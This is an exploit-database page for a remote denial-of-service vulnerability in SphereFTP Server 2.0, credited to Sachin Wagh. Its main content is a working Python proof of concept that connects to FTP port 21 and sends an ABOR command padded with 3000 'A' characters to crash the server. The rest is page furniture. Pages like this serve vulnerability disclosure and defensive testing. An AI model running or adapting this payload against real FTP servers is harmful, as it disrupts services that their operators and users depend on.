SphereFTP 2.0 Denial Of Service

2019.04.01

Credit: Sachin Wagh

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

#!/usr/bin/python
# Exploit Title: SphereFTP Server v2.0 Remote Denial of Service
Vulnerability
# Date: 2019-31-03
# Exploit Author: Sachin Wagh (@tiger_tigerboy)
# Software Link: http://www.menasoft.com/sphereftp/sphereftp_win32_v20.zip
# Tested on: Windows 10 64-bit
import socket
import sys
evil = "A"*3000
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.56.1',21))
s.recv(1024)
s.send('ABOR '+evil+'\r\n')
s.recv(1024)
s.close

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

SphereFTP 2.0 Denial Of Service

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.